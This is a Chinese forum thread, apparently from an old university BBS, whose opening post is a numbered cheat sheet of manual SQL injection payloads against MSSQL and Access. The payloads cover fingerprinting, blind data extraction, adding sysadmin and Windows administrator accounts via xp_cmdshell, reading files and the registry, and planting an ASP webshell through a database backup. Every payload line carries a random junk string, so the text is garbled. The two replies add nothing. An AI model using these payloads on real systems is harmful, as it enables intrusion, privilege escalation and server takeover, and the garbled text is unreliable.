社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3838阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 c{{RP6o/j=  
  2.初步判断是否是mssql ;and user>0 n%d7`?tm4  
+EvY-mwfQ  
  3.注入参数是字符'and [查询条件] and ''=' zxrbEE Q  
T( CTU/a-,  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' Z^t{m!v  
>f:OU,"  
  5.判断数据库系统 ?/YT,W<c;&  
CP LsSv5  
  ;and (select count(*) from sysobjects)>0 mssql R,8460e7  
=kBWY9 :$,  
  ;and (select count(*) from msysobjects)>0 access ZJ%iiY  
0I}c|V'P  
(L,>P`CR6  
-cB>; f)5r  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 o(@^V!}V  
V?r(;x  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $|o[l.q2  
S.*.nv  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4<S=KFT_  
uX8G<7O^  
  9.(1)猜字段的ascii值(access) =PmIrvr'[5  
Tilw.z  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yhxZ^ (I  
[-hsG E  
  (2)猜字段的ascii值(mssql) @ 5V3I^  
;edt["Eu  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 8.tp#x,A  
"vo o!&<  
  10.测试权限结构(mssql) psAr>:\3  
_YA;Nd#%k  
B i`m+ob  
v4W<_ 7L_  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- MNH-SQB|  
+|.6xC7U  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- a9p6[qOcd  
l*|m(7s  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- POb2U1Sj  
>]/aG!  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- tREC)+*\  
hEfFMi=a`  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- S*(n s<L  
(2'q~Z+>'  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ?dQ#%06mn  
?#J;\^  
  ;and 1=(select IS_MEMBER('db_owner'));-- V ee;&  
f=Kt[|%'e  
~?:Xi_3Lo  
Yzih-$g  
  11.添加mssql和系统的帐户 VRvX^w0  
vve[.Lud'  
  ;exec master.dbo.sp_addlogin username;-- f= 33+8I  
  ;exec master.dbo.sp_password null,username,password;--  m8z414o  
m$A-'*'  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- l/6(V:  
0r%,|FaS  
  ;exec master.dbo.xp_cmdshell 'net user username password `YK%I8  
&` weW  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ! 345  
2VgVn,c  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- {3N5Fi7S  
FSyeDC^@  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- QUi=ZD1  
jHM}({)-  
1w|u ^[~u\  
z{G@t0q  
  12.(1)遍历目录 G-G\l?R(  
Wfj*)j Q  
  ;create table dirs(paths varchar(100), id int) 3R[,,WAj$  
(d}z>?L  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' (!dwUB  
TuMD+^x  
  ;and (select top 1 paths from dirs)>0 c7/fQc)h4d  
'DCB 7T8  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) [p 8fg!|  
d>jRw  
T`r\yl}  
<UBB&}R0  
  (2)遍历目录 AGgL`sP  
-LMO f?  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ]tO9<  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 G FO(O  
 #)28ESj  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 0?\d%J!"S  
/r mm@  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 \I~9%QJ>  
TDjjaO  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 vV /fTO  
`yWWX.`  
I cz) Qtg|  
f*GdHUZ*  
  13.mssql中的存储过程 S0-/9h  
^]1M8R,  
  xp_regenumvalues 注册表根键, 子键 ${w\^6&  
q)KLf\  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 r Q$Jk[Y  
zoO9N oUHW  
  xp_regread 根键,子键,键值名 ~riV9_-  
F ][QH\N  
  ;exec xp_regread n^;Sh$ Os  
N!#TK9  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8CN 0Q&|  
7EukrE<b'  
  xp_regwrite 根键,子键, 值名, 值类型, 值 xN]88L}Tn  
1F58 2 l  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 a>/jW-?  
2=ZZR8v  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 T0Zv.  
]WP[hF  
  xp_regdeletevalue 根键,子键,值名 DeL7sU  
nLv"ON~  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 yct^AN|%  
VS_xC $X!S  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 @&E{ L  
}!0nb)kL  
"N4rh<<  
f3Cjj]RFv  
  14.mssql的backup创建webshell UkV{4*E  
)4/227b/(  
  use model @Zd/>'  
ZsikI@?  
  create table cmd(str image); iv]*HE  
*C n `pfO  
  insert into cmd(str) values (''); jM  DG  
wa}\bNKQk  
  backup database model to disk='c:\l.asp'; YQk<1./}I  
SUQk0 (M  
??.9`3CYo  
7Yrp#u1!  
  15.mssql内置函数 H3Z"u  
_/zK ^S)  
  ;and (select @@version)>0 获得Windows的版本号 'dTg\ Qv  
.ko}m{  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^6[o$eY3  
qC?\i['`  
  ;and (select user_name())>0 爆当前系统的连接用户 V=|X=:fuih  
0/Wo":R:  
  ;and (select db_name())>0 得到当前连接的数据库 LV X01ox$  
4,pSC  
7ZVW7%,zF  
T2V# fYCc  
  16.简洁的webshell #`9D,+2iB%  
xX]92Q  
  use model }R -azN;  
EO[UezuU  
  create table cmd(str image); MGzuQrl{H  
(o5+9'y"9  
  insert into cmd(str) values (''); h#iFp9N  
ZT;:Hxv0N  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五